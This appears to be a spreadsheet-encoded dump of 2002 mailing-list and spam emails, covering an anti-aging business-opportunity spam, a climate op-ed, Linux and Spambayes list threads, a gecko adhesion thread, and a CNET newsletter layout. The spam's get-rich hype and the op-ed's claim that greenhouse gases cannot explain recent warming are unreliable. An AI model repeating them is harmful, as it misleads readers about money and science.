 =
 &lt;meta http-equiv=3DContent-Type content=3D"text/html; charset=3Dwindows-1252"&gt;
 =
 &lt;meta name=3DProgId content=3DWord.Document&gt;
 =
 &lt;meta name=3DGenerator content=3D"Microsoft Word 9"&gt;
 =
 &lt;meta name=3DOriginator content=3D"Microsoft Word 9"&gt;
 =
 &lt;link rel=3DFile-List
 =
 href=3D"./PROFIT%20FROM%20THE%20BOOMERS-july%209_files/filelist.xml"&gt;
 =
 &lt;title&gt;HOW DO I PROFIT FROM THE BOOMERS &lt;/title&gt;
 =
 &lt;!--[if gte mso 9]&gt;&lt;xml&gt;
 =
  &lt;o:DocumentProperties&gt;
 =
   &lt;o:Author&gt;Val Curl&lt;/o:Author&gt;
 =
   &lt;o:Template&gt;Normal&lt;/o:Template&gt;
 =
   &lt;o:LastAuthor&gt;Val Curl&lt;/o:LastAuthor&gt;
 =
   &lt;o:Revision&gt;2&lt;/o:Revision&gt;
 =
   &lt;o:TotalTime&gt;95&lt;/o:TotalTime&gt;
 =
   &lt;o:Created&gt;2002-07-13T21:21:00Z&lt;/o:Created&gt;
 =
   &lt;o:LastSaved&gt;2002-07-13T21:21:00Z&lt;/o:LastSaved&gt;
 =
   &lt;o:Pages&gt;2&lt;/o:Pages&gt;
 =
   &lt;o:Words&gt;333&lt;/o:Words&gt;
 =
   &lt;o:Characters&gt;1903&lt;/o:Characters&gt;
 =
   &lt;o:Lines&gt;15&lt;/o:Lines&gt;
 =
   &lt;o:Paragraphs&gt;3&lt;/o:Paragraphs&gt;
 =
   &lt;o:CharactersWithSpaces&gt;2337&lt;/o:CharactersWithSpaces&gt;
 =
   &lt;o:Version&gt;9.2720&lt;/o:Version&gt;
 =
  &lt;/o:DocumentProperties&gt;
 =
 &lt;/xml&gt;&lt;![endif]--&gt;
 =
 &lt;style&gt;
 =
 &lt;!--
 =
  /* Font Definitions */
 =
 @font-face
 =
 	{font-family:"Lucida Handwriting";
 =
 	panose-1:3 1 1 1 1 1 1 1 1 1;
 =
 	mso-font-charset:0;
 =
 	mso-generic-font-family:script;
 =
 	mso-font-pitch:variable;
 =
 	mso-font-signature:3 0 0 0 1 0;}
 =
 @font-face
 =
 	{font-family:Impact;
 =
 	panose-1:2 11 8 6 3 9 2 5 2 4;
 =
 	mso-font-charset:0;
 =
 	mso-generic-font-family:swiss;
 =
 	mso-font-pitch:variable;
 =
 	mso-font-signature:647 0 0 0 159 0;}
 =
  /* Style Definitions */
 =
 p.MsoNormal, li.MsoNormal, div.MsoNormal
 =
 	{mso-style-parent:"";
 =
 	margin:0in;
 =
 	margin-bottom:.0001pt;
 =
 	mso-pagination:widow-orphan;
 =
 	font-size:12.0pt;
 =
 	font-family:"Times New Roman";
 =
 	mso-fareast-font-family:"Times New Roman";}
 =
 p.MsoBodyText, li.MsoBodyText, div.MsoBodyText
 =
 	{margin:0in;
 =
 	margin-bottom:.0001pt;
 =
 	text-align:center;
 =
 	mso-pagination:widow-orphan;
 =
 	font-size:12.0pt;
 =
 	font-family:Arial;
 =
 	mso-fareast-font-family:"Times New Roman";}
 =
 p.MsoBodyText2, li.MsoBodyText2, div.MsoBodyText2
 =
 	{margin:0in;
 =
 	margin-bottom:.0001pt;
 =
 	text-align:center;
 =
 	mso-pagination:widow-orphan;
 =
 	font-size:28.0pt;
 =
 	mso-bidi-font-size:12.0pt;
 =
 	font-family:Impact;
 =
 	mso-fareast-font-family:"Times New Roman";
 =
 	mso-bidi-font-family:Arial;
 =
 	color:purple;}
 =
 a:link, span.MsoHyperlink
 =
 	{color:blue;
 =
 	text-decoration:underline;
 =
 	text-underline:single;}
 =
 a:visited, span.MsoHyperlinkFollowed
 =
 	{color:purple;
 =
 	text-decoration:underline;
 =
 	text-underline:single;}
 =
 @page Section1
 =
 	{size:8.5in 11.0in;
 =
 	margin:.6in .6in .6in .6in;
 =
 	mso-header-margin:.2in;
 =
 	mso-footer-margin:.2in;
 =
 	mso-paper-source:0;}
 =
 div.Section1
 =
 	{page:Section1;}
 =
 --&gt;
 =
 &lt;/style&gt;
 =
 &lt;/head&gt;
 =
 =
 &lt;body lang=3DEN-US link=3Dblue vlink=3Dpurple style=3D'tab-interval:.5in'&gt;
 =
 =
 &lt;div class=3DSection1&gt;
 =
 =
 &lt;p class=3DMsoBodyText2&gt;&lt;span style=3D'font-size:36.0pt;mso-bidi-font-size:12.=
 0pt'&gt;HOW
 =
 DO I PROFIT FROM THE&lt;br&gt;
 =
 90 MILLION BABY BOOMERS ?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;
 =
 =
 &lt;p class=3DMsoNormal align=3Dcenter style=3D'text-align:center'&gt;&lt;span
 =
 style=3D'color:#666699'&gt;--------------------------------------------------------=
 --------------------------------------------------------&lt;br
 =
 style=3D'mso-special-character:line-break'&gt;
 =
 &lt;![if !supportLineBreakNewLine]&gt;&lt;br style=3D'mso-special-character:line-break'&gt;
 =
 &lt;![endif]&gt;&lt;/span&gt;&lt;span style=3D'font-family:Arial'&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;
 =
 =
 &lt;p class=3DMsoBodyText&gt;&lt;b&gt;&lt;span style=3D'font-size:18.0pt;mso-bidi-font-size:12.=
 0pt;
 =
 color:#666699'&gt;Become an &lt;u&gt;EXCLUSIVE&lt;/u&gt; &lt;u&gt;PROVIDER&lt;/u&gt; of a&lt;br&gt;
 =
 LOOK YOUNGER PRODUCT&lt;br&gt;
 =
 that the Boomers &lt;u&gt;WANT&lt;/u&gt; !&lt;/span&gt;&lt;/b&gt;&lt;span style=3D'color:#666699'&gt;&lt;br&gt;
 =
 &lt;br&gt;
 =
 &lt;/span&gt;&lt;b&gt;&lt;span style=3D'font-size:18.0pt;mso-bidi-font-size:12.0pt;=
 color:#666699'&gt;Provide
 =
 a &lt;u&gt;PATENTED&lt;/u&gt; product that successfully addresses&lt;/span&gt;&lt;/b&gt;&lt;br&gt;
 =
 &lt;b&gt;&lt;span style=3D'font-size:20.0pt;mso-bidi-font-size:12.0pt;=
 font-family:"Lucida Handwriting";
 =
 color:fuchsia'&gt;Wrinkles, Dark Circles, Age Spots, Fine Lines, Cellulite, =
 Spider
 =
 Veins, and MORE !&lt;/span&gt;&lt;/b&gt;&lt;span style=3D'font-size:20.0pt;mso-bidi-font-size:
 =
 12.0pt;color:fuchsia'&gt;&lt;br&gt;
 =
 &lt;/span&gt;&lt;br&gt;
 =
 &lt;b&gt;&lt;span style=3D'font-size:18.0pt;mso-bidi-font-size:12.0pt;=
 color:#666699'&gt;Provide
 =
 an AFFORDABLE, &lt;u&gt;HEALTHY&lt;/u&gt; product that&lt;br&gt;
 =
 shows &lt;u&gt;FAST RESULTS&lt;/u&gt; on the OUTSIDE of the body&lt;br&gt;
 =
 while providing the proven benefits of&lt;br&gt;
 =
 SUPER ANTIOXIDANTS at the cellular level !&lt;br&gt;
 =
 &lt;/span&gt;&lt;/b&gt;&lt;span style=3D'color:#666699'&gt;&lt;br&gt;
 =
 ------------------------------------------------------------------------------=
 ----------------------------------&lt;br&gt;
 =
 &lt;/span&gt;&lt;br&gt;
 =
 &lt;b&gt;&lt;span style=3D'font-size:24.0pt;mso-bidi-font-size:12.0pt;color:#666699'&gt;We =
 &lt;u&gt;ALL&lt;/u&gt;
 =
 know that&lt;/span&gt;&lt;/b&gt;&lt;br&gt;
 =
 &lt;span style=3D'font-size:48.0pt;mso-bidi-font-size:12.0pt;font-family:Impact;
 =
 color:fuchsia'&gt;VANITY SELLS !&lt;/span&gt;&lt;span style=3D'font-size:24.0pt;=
 mso-bidi-font-size:
 =
 12.0pt;font-family:Impact;color:fuchsia'&gt;&lt;br&gt;
 =
 &lt;/span&gt;&lt;span =
 style=3D'color:#666699'&gt;---------------------------------------------------------=
 -------------------------------------------------------&lt;br&gt;
 =
 &lt;/span&gt;&lt;br&gt;
 =
 &lt;b&gt;&lt;u&gt;&lt;span style=3D'font-size:18.0pt;mso-bidi-font-size:12.0pt;=
 color:#666699'&gt;WHY
 =
 NOT&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;span style=3D'font-size:18.0pt;mso-bidi-font-size:12.0pt;
 =
 color:#666699'&gt;&lt;br&gt;
 =
 &lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span style=3D'font-size:18.0pt;mso-bidi-font-size:12.0pt;
 =
 color:fuchsia'&gt;LOOK TEN YEARS YOUNGER and &lt;u&gt;GET PAID FOR IT&lt;/u&gt; ?=
 &lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span
 =
 style=3D'font-size:18.0pt;mso-bidi-font-size:12.0pt;color:#993366'&gt;&lt;br&gt;
 =
 &lt;/span&gt;&lt;/b&gt;&lt;span =
 style=3D'color:#666699'&gt;---------------------------------------------------------=
 -------------------------------------------------------&lt;br&gt;
 =
 &lt;/span&gt;&lt;br&gt;
 =
 &lt;b&gt;&lt;span style=3D'font-size:20.0pt;mso-bidi-font-size:12.0pt;=
 color:#666699'&gt;THIS
 =
 BOOMER PHENOMENON IS HAPPENING&lt;br&gt;
 =
 WITH or WITHOUT&lt;br&gt;
 =
 YOU or ME &lt;br&gt;
 =
 &lt;br&gt;
 =
 THIS RECEPTIVE MARKETPLACE WILL CREATE&lt;/span&gt;&lt;/b&gt;&lt;span =
 style=3D'color:#FF99CC'&gt;&lt;br&gt;
 =
 &lt;/span&gt;&lt;span style=3D'font-size:36.0pt;mso-bidi-font-size:12.0pt;font-family:
 =
 Impact;color:fuchsia'&gt;MILLIONAIRES !!!&lt;/span&gt;&lt;span style=3D'font-size:36.0pt;
 =
 mso-bidi-font-size:12.0pt;font-family:Impact'&gt;&lt;br&gt;
 =
 &lt;br&gt;
 =
 &lt;/span&gt;&lt;b&gt;&lt;i&gt;&lt;u&gt;&lt;span style=3D'font-size:26.0pt;mso-bidi-font-size:12.0pt;
 =
 color:#666699'&gt;WHY NOT&lt;/span&gt;&lt;/u&gt;&lt;/i&gt;&lt;/b&gt;&lt;b&gt;&lt;i&gt;&lt;span style=3D'font-size:26.0pt;
 =
 mso-bidi-font-size:12.0pt;color:#666699'&gt; BE ONE OF THEM ?&lt;/span&gt;&lt;/i&gt;&lt;/b&gt;&lt;br&gt;
 =
 &lt;span =
 style=3D'color:#666699'&gt;---------------------------------------------------------=
 -------------------------------------------------------&lt;br&gt;
 =
 &lt;/span&gt;&lt;br&gt;
 =
 &lt;span style=3D'font-size:48.0pt;mso-bidi-font-size:12.0pt;font-family:Impact;
 =
 color:fuchsia'&gt;&lt;a href=3D"mailto:go@tytcorp.com"&gt;&lt;span style=3D'color:
 =
 fuchsia'&gt;CLICK HERE&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;b&gt;&lt;span style=3D'font-size:48.0pt;
 =
 mso-bidi-font-size:12.0pt'&gt;&lt;br&gt;
 =
 &lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span style=3D'font-size:16.0pt;mso-bidi-font-size:12.0pt'&gt;with =
 &lt;/span&gt;&lt;/b&gt;&lt;span
 =
 style=3D'font-size:24.0pt;mso-bidi-font-size:12.0pt;font-family:Impact;
 =
 color:#666699'&gt;Im Your Leader&lt;/span&gt;&lt;b&gt;&lt;span style=3D'font-size:16.0pt;
 =
 mso-bidi-font-size:12.0pt'&gt; or &lt;/span&gt;&lt;/b&gt;&lt;span style=3D'font-size:24.0pt;
 =
 mso-bidi-font-size:12.0pt;font-family:Impact;color:#666699'&gt;Product =
 Only&lt;/span&gt;&lt;b&gt;&lt;span
 =
 style=3D'font-size:16.0pt;mso-bidi-font-size:12.0pt'&gt; in the Subject Line&lt;br&gt;
 =
 &lt;br&gt;
 =
 &lt;/span&gt;&lt;/b&gt;&lt;b&gt;&lt;span style=3D'font-size:18.0pt;mso-bidi-font-size:12.0pt;
 =
 color:#666699'&gt;You Will be emailed information sufficient for you to make an
 =
 Educated Business Decision as to whether this phenomenon is something you =
 want
 =
 to pursue or not &lt;br&gt;
 =
 NO HYPE / NO OBLIGATION&lt;br style=3D'mso-special-character:line-break'&gt;
 =
 &lt;![if !supportLineBreakNewLine]&gt;&lt;br style=3D'mso-special-character:line-break'&gt;
 =
 &lt;![endif]&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
 =
 =
 &lt;p class=3DMsoBodyText&gt;&lt;b&gt;&lt;span style=3D'font-size:18.0pt;mso-bidi-font-size:12.=
 0pt;
 =
 color:#666699'&gt;&lt;![if !supportEmptyParas]&gt;&amp;nbsp;&lt;!=
 [endif]&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;
 =
 =
 &lt;p =
 class=3DMsoNormal&gt;---------------------------------------------------------------=
 -------------------------------------------------------------------&lt;/p&gt;
 =
 =
 &lt;p class=3DMsoBodyText&gt;&lt;span style=3D'font-size:10.0pt;mso-bidi-font-size:8.=
 0pt'&gt;Your
 =
 email address was obtained from an opt-in list.&lt;span style=3D"mso-spacerun:
 =
 yes"&gt; &lt;/span&gt;If you wish to unsubscribe from this list please Click on =
 REMOVE
 =
 ME, below, and Click send.&lt;/span&gt;&lt;span style=3D'font-size:10.0pt;=
 mso-bidi-font-size:
 =
 7.5pt'&gt;&lt;br&gt;
 =
 TO BE REMOVED:&lt;span style=3D"mso-spacerun: yes"&gt; &lt;/span&gt;PLEASE &lt;u&gt;DO NOT&lt;/u&gt;
 =
 CLICK ON THE REPLY BUTTON &lt;br&gt;
 =
 JUST &lt;u&gt;CLICK HERE&lt;/u&gt; AT &lt;/span&gt;&lt;b&gt;&lt;span style=3D'font-size:16.0pt;=
 mso-bidi-font-size:
 =
 10.0pt'&gt;&lt;a href=3D"mailto:remove@nouce1.com"&gt;REMOVE ME&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;span
 =
 style=3D'font-size:10.0pt;mso-bidi-font-size:7.5pt'&gt; with &amp;quot;REMOVE ME&amp;quot;
 =
 in Subject Line. You will be immediately and permanently removed from this
 =
 database, and please accept our apologies for any inconvenience. BEST OF
 =
 SUCCESS IN WHATEVER YOU CHOOSE TO DO IN LIFE!&lt;br&gt;
 =
 &lt;/span&gt;-----------------------------------------------------------------------=
 -----------------------------------------------------------&lt;span
 =
 style=3D'color:#666699'&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;
 =
 =
 &lt;/div&gt;
 =
 =
 &lt;/body&gt;
 =
 =
 &lt;/html&gt;
 =
 =
 ------=_NextPart_244_43836275737818467044071--
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Human handshake opens data stream
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8639021,1440/
 Date: Not supplied
 A new Japanese system allows palmtop computers to swap large amounts of data 
 when their owners shake hands
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Just Ask the Experts
</t>
  </si>
  <si>
    <t xml:space="preserve">A little tidbit for those who still believe in science by opinion poll...
 Cheers,
 RAH
 http://www.techcentralstation.com/1051/printer.jsp?CID=1051-072302B
 Just Ask the Experts
 By Sallie Baliunas and Willie Soon 07/23/2002
 In 2001 the National Science Foundation surveyed 1,500 people nationwide
 and found that 77% believed that "increased carbon dioxide and other gases
 released into the atmosphere will, if unchecked, lead to global warming
 ..." Yet half of those polled believed that humans and dinosaurs co-existed
 on Earth, despite the scientific fact that the dinosaurs went extinct tens
 of millions of years before the earliest hominids appeared. Worse, only 22%
 of the respondents understood what a molecule - for example, carbon dioxide
 - is.
 As in the case of the belief by many that dinosaurs and early humans
 co-existed, public opinion does not change the actual facts about the
 material world. Such a poll measures nothing more than the degree of public
 ignorance about scientific matters.
 Most people get news stories about science and technology developments from
 television. And after more than a decade of being fed what-if stories about
 global warming from human activities, no wonder most people "believe" that
 global warming "will" occur. However, on the anxiety scale, only 33% "worry
 a great deal" about global warming, a worry that ranks at 12 out of 13
 environmental concerns. The top environmental fear, shared by 64% of those
 polled, was polluted drinking water.
 So What Do We Know?
 Concerning the latest understanding on human-made global warming, here are
 three points we know from the science:
    1. The surface record of temperature from thermometers show widespread
 warming in the 20th century compared to the 19th. There was one period of
 warming early in the 20th century, the second after the 1970s. Ecosystems
 have responded to this widespread warmth, not seen since ca. 800 - 1200 C.E.
       But the cause of global surface warming cannot be associated with
 human activity without additional information. Some media reports point to
 ecosystem responses of 20th century warmth (e.g., mountain glacier retreat)
 and unjustifiably claim the responses owe to man-made causes. But mountain
 glaciers receded during the past period of warmth around 1,000 years ago,
 and advanced during the unusual cold of the Little Ice Age (ca. 1300 - 1900
 C.E.). Both those climate shifts occurred naturally, before the increased
 concentration of human-made greenhouse gases in the air.
     # All computer simulations of climate say that in order to conclude
 that the surface global warming trend is human caused, the surface warmth
 must be accompanied by an equal or larger warming trend in the air from one
 to five miles in height. Measurements made by satellites and verified from
 weather balloons show no meaningful human-made warming trend over the last
 two or even four decades. Thus, the recent warming trend in the surface
 temperature record cannot be caused by the increase of human-made
 greenhouse gases in the air.
     # The computer simulations are not reliable as tools for explaining
 past climate or making projections for future trends.
 Future Shock: The Scenarios
 When it comes to future scenarios, consider what the experts actually say
 about potential climate change. The United Nations Intergovernmental Panel
 on Climate Change writes in its Special Report on Emissions Scenarios
 (2000), "Scenarios are images of the future or alternative futures. They
 are neither predictions nor forecasts." Further, "The possibility that any
 single emissions path will occur as described in the scenario is highly
 uncertain," and finally, "No judgement is offered in this Report as to the
 preference for any of the scenarios and they are not assigned probabilities
 of occurrence, neither must they be interpreted as policy recommendations."
 Forecasting future societal conditions and energy use often amount to
 little more than unconvincing guesses. Jesse Ausebel at Rockefeller
 University in April 2002 critiqued the U.N. IPCC's " ... 40 energy
 scenarios, with decarbonization, or carbonization, sloping every which way
 and no probabilities attached. ... It is a confession that collectively
 they know nothing, that no science underlies their craft, and that politics
 strongly bias their projections."
 Nonetheless, such a guess about the world's energy future forms the first
 step in making a 100-year prediction of global warming. That first
 uncertain forecast - future energy use - used as input in the climate
 simulation surely compounds the uncertainty in the next step, the climate
 forecast.
 Inability to predict the future should not be surprising. The climate
 simulations upon which predictions are based yield unreliable results
 because, as outlined above, the results are incompatible with measurements
 of how the climate has changed in the last few decades.
 Complete Speculation
 On May 24, 1994, Richard Lindzen, the Alfred P. Sloan Professor of
 Meteorology at MIT, testified to the Senate Committee on Energy and Natural
 Resources, "The claims about catastrophic consequences of significant
 global warming, should it occur at all, are almost completely speculative.
 Not only are they without any theoretical foundations, but they frequently
 involved assuming the opposite of what appears to happen."
 Despite years of solid work by climate specialists, the output of computer
 simulations remains undependable, owing to the extraordinary complexity of
 the natural world. Thus, on May 1, 2001 Lindzen testified to the Senate
 Commerce Committee about the long-standing inability of computer
 simulations to deliver results that resemble reality, even in the cases
 where good measurements are available:
 "For example, there is widespread agreement [among climate scientists] ...
 that large computer climate models are unable to even simulate major
 features of past climate such as the 100 thousand year cycles of ice ages
 that have dominated climate for the past 700 thousand years, and the very
 warm climates of the Miocene [23 to 5 million years ago], Eocene [57 to 35
 million years ago], and Cretaceous [146 to 65 million years ago]. Neither
 do they do well at accounting for shorter period and less dramatic
 phenomena like El Ninos, quasi-biennial oscillations, or intraseasonal
 oscillations - all of which are well documented in the data, and important
 contributors to natural variability."
 Lindzen explained the failure of computer simulations simply in May 2000:
 "The point I am making is that it is a fallacious assumption that the
 models have everything in them, and will display it, and somehow the rest
 is just technical uncertainty. There are things they literally don't have."
 This punctuates the popular notion that averaging output from computer
 results will somehow, miraculously, give a scientifically appropriate
 result.
 Think Locally
 Now, on top of the unreliable forecasts of global warming -- which rest on
 "highly uncertain" forecasts of future economic and social conditions and
 un-validated climate simulations -- come the forecasts of local impacts, in
 order to make the case for relevancy to people. Increased storminess is one
 prediction of the outcome of human-made global warming found in the popular
 media, which would be where most people learn about the issue.
 The idea that storminess increases with human-made global warming defies
 expert opinion. David Legates, an expert hydrology researcher, testified in
 the Senate Committee on Environment and Public Works on March 13, 2002:
 "Ascertaining anthropogenic changes to these extreme weather events is
 nearly impossible. Climate models cannot even begin to simulate storm-scale
 systems, let alone model the full range of year-to-year variability...
 Clearly, claims that anthropogenic global warming will lead to more
 occurrences of droughts, floods, and storms are wildly exaggerated."
 The U.N. IPCC Third Assessment Report concurs, "[T]here is currently
 insufficient information to assess recent trends, and climate models
 currently lack the spatial detail required to make confident projections.
 For example, very small-scale phenomena, such as thunderstorms, tornadoes,
 hail and lightning, are not simulated in climate models (Summary for
 Policymakers, p. 15)."
 A group of extremely relevant experts, the American Association of State
 Climatologists, recently summarized the state of climate simulations:
 "Climate prediction is complex with many uncertainties ... For time scales
 of a decade or more, understanding the empirical accuracy of such
 predictions - called "verification" - is simply impossible, since we have
 to wait a decade or longer to assess the accuracy of the forecasts. ...
 climate predictions have not demonstrated skill in projecting future
 variability and changes in such important climate conditions as growing
 season, drought, flood-producing rainfall, heat waves, tropical cyclones
 and winter storms. These are the type of events that have a more
 significant impact on society than annual average global temperature
 trends."
 On the facts of human-made global warming, should one believe television or
 the experts?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</si>
  <si>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Subject: Re: [ILUG] Mutt reply hooks
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue 30 Jul 2002 10:28, David Neary wrote:
 &gt; I have 3 or 4 email addresses (which get used for different
 &gt; reasons), and I'd prefer not to mix them up. So I was wondering
 &gt; if anyone knows of a way that I can have mail (apart from list
 &gt; mail, which I have already sorted) which arrives to a certain
 &gt; e-mail address have the From: header in the reply automatically
 &gt; set to the address it came to.
 I don't know Mutt, to be honest, but the KDE mail client "KMail" can
 do this very neatly - you set up multiple "Identity" profiles, each
 with a distinct email address (and other things if desired, like a GPG
 key and a signature).  You can then set up KMail to use various
 identities automatically when replying to messages which match a
 particular pattern, or which are in a particular folder, etc.  It's
 all very cool, and it works very nicely.
 But I still don't know how to do it in Mutt.
              Colm
 -- 
 Colm Buckley | colm@tuatha.org | +353 87 2469146 | www.colm.buckley.name
 A dirty mind is a terrible thing to waste.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: Gecko adhesion finally sussed.
</t>
  </si>
  <si>
    <t xml:space="preserve">Great, this is half of what I'd need to become Spider Man! Now all I need to
 figure out is how to do that spider web shooting thing.
 - Jim
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of
 &gt; Eirikur Hallgrimsson
 &gt; Sent: Monday, August 26, 2002 10:24 PM
 &gt; To: FoRK
 &gt; Subject: Gecko adhesion finally sussed.
 &gt;
 &gt;
 &gt; (Via Robot Wisdom)   Maybe you UC folk know these people?
 &gt;
 &gt; http://www.eurekalert.org/pub_releases/2002-08/lcc-sph082202.php
 &gt;
 &gt; Working at Lewis &amp; Clark College, the University of California at
 &gt; Berkeley,
 &gt; the University of California at Santa Barbara, and Stanford University,
 &gt; the interdisciplinary team:
 &gt;
 &gt;     * confirmed speculation that the gecko's amazing climbing ability
 &gt; depends on weak molecular attractive forces called van der Waals forces,
 &gt;
 &gt;     * rejected a competing model based on the adhesion chemistry of water
 &gt; molecules, and
 &gt;
 &gt; * discovered that the gecko's adhesive depends on geometry, not surface
 &gt; chemistry. In other words, the size and shape of the tips of gecko foot
 &gt; hairs--not what they are made of--determine the gecko's stickiness.
 &gt;
 &gt; To verify its experimental and theoretical results, the gecko group then
 &gt; used its new data to fabricate prototype synthetic foot-hair tips
 &gt; from two
 &gt; different materials.
 &gt;
 &gt; "Both artificial setal tips stuck as predicted," notes Autumn, assistant
 &gt; professor of biology at Lewis &amp; Clark College in Portland, Ore. "Our
 &gt; initial prototypes open the door to manufacturing the first biologically
 &gt; inspired dry, adhesive microstructures, which can have widespread
 &gt; applications."
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Spambayes] understanding high false negative rate
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "TP" == Tim Peters &lt;tim.one@comcast.net&gt; writes:
   TP&gt; [Jeremy Hylton[
   &gt;&gt; The total collections are 1100 messages.  I trained with 1100/5
   &gt;&gt; messages.
   TP&gt; I'm reading this now as that you trained on about 220 spam and
   TP&gt; about 220 ham.  That's less than 10% of the sizes of the
   TP&gt; training sets I've been using.  Please try an experiment: train
   TP&gt; on 550 of each, and test once against the other 550 of each.
 This helps a lot!  Here are results with the stock tokenizer:
 Training on &lt;mbox: /home/jeremy/Mail/INBOX 0&gt; &amp; &lt;mbox: /home/jeremy/Mail/spam 8&gt;
  ... 644 hams &amp; 557 spams
       0.000  10.413
       1.398   6.104
       1.398   5.027
 Training on &lt;mbox: /home/jeremy/Mail/INBOX 0&gt; &amp; &lt;mbox: /home/jeremy/Mail/spam 0&gt;
  ... 644 hams &amp; 557 spams
       0.000   8.259
       1.242   2.873
       1.242   5.745
 Training on &lt;mbox: /home/jeremy/Mail/INBOX 2&gt; &amp; &lt;mbox: /home/jeremy/Mail/spam 3&gt;
  ... 644 hams &amp; 557 spams
       1.398   5.206
       1.398   4.488
       0.000   9.336
 Training on &lt;mbox: /home/jeremy/Mail/INBOX 2&gt; &amp; &lt;mbox: /home/jeremy/Mail/spam 0&gt;
  ... 644 hams &amp; 557 spams
       1.553   5.206
       1.553   5.027
       0.000   9.874
 total false pos 139 5.39596273292
 total false neg 970 43.5368043088
 And results from the tokenizer that looks at all headers except Date,
 Received, and X-From_:
 Training on &lt;mbox: /home/jeremy/Mail/INBOX 0&gt; &amp; &lt;mbox: /home/jeremy/Mail/spam 8&gt;
  ... 644 hams &amp; 557 spams
       0.000   7.540
       0.932   4.847
       0.932   3.232
 Training on &lt;mbox: /home/jeremy/Mail/INBOX 0&gt; &amp; &lt;mbox: /home/jeremy/Mail/spam 0&gt;
  ... 644 hams &amp; 557 spams
       0.000   7.181
       0.621   2.873
       0.621   4.847
 Training on &lt;mbox: /home/jeremy/Mail/INBOX 2&gt; &amp; &lt;mbox: /home/jeremy/Mail/spam 3&gt;
  ... 644 hams &amp; 557 spams
       1.087   4.129
       1.087   3.052
       0.000   6.822
 Training on &lt;mbox: /home/jeremy/Mail/INBOX 2&gt; &amp; &lt;mbox: /home/jeremy/Mail/spam 0&gt;
  ... 644 hams &amp; 557 spams
       0.776   3.411
       0.776   3.411
       0.000   6.463
 total false pos 97 3.76552795031
 total false neg 738 33.1238779174
 Is it safe to conclude that avoiding any cleverness with headers is a
 good thing?
   TP&gt; Do that a few times making a random split each time (it won't be
   TP&gt; long until you discover why directories of individual files are
   TP&gt; a lot easier to work -- e.g., random.shuffle() makes this kind
   TP&gt; of thing trivial for me).
 You haven't looked at mboxtest.py, have you?  I'm using
 random.shuffle(), too.  You don't need to have many files to make an
 arbitrary selection of messages from an mbox.
 I'll report some more results when they're done.
 Jeremy
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: CNET: Copycat worms and a PGP Outlook flaw
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 	&lt;title&gt;CNET Virus &amp; Security Newsletter&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#eeeeee"&gt;
 &lt;center&gt;
 &lt;a href="top"&gt;&lt;/a&gt;
 &lt;!-- header --&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=612 bgcolor="#ffffff"&gt;
 &lt;tr valign=top&gt;
 	&lt;td width=442 colspan=4&gt;
 		&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/sw/442_viriusHEAD_NEWSLTR.gif" width="442" height="60" border="0" alt="CNET Virus &amp; Security Newsletter"&gt;&lt;br&gt;
 			&lt;table width=442 cellpadding=0 cellspacing=0 border=0 bgcolor="#ffcc00"&gt;
 				&lt;tr&gt;&lt;td bgcolor="#000000" colspan=3&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 				&lt;tr&gt;
 					&lt;td bgcolor="#000000" width=1 rowspan=2&gt;&lt;img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&lt;img src="http://home.cnet.com/i/dp/dd_b.gif" width="160" height="18" border="0"&gt;&lt;br&gt;
 		&lt;table cellpadding=0 cellspacing=0 border=0 width=160&gt;
 		&lt;tr&gt;&lt;td align=center bgcolor="#eeeeee"&gt;&lt;img src="http://www.cnet.com/Ads/Media/Images/ad10-dk.gif" width="120" height="10" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 		&lt;/table&gt;
 	&lt;iframe src="http://www.zdnet.com/include/ads/ifc/RGROUP=2560" scrolling="no" frameborder="0" hspace="0" vspace="0" height="600" width="160" marginheight="0" marginwidth="0"&gt;
 &lt;script language="JavaScript" src="http://www.zdnet.com/include/ads/js/RGROUP=2560"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;&lt;br&gt;
 		&amp;nbsp;&lt;br&gt;
 		&lt;!-- right column content --&gt;
 &amp;nbsp;&lt;br&gt;
 	&lt;/td&gt;
 	&lt;td width=9 rowspan=2&gt;
 		&lt;img src="http://home.cnet.com/i/dp/dd_c.gif"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
 	&lt;td width=1 bgcolor="#000000" rowspan=2&gt;
 		&lt;table width=1 cellpadding=0 cellspacing=0 border=0&gt;
 			&lt;tr&gt;&lt;td bgcolor="#eeeeee"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="60" border="0"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;
 		&lt;/table&gt;		
 	&lt;/td&gt;
 &lt;/tr&gt;
 &lt;!-- promo section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
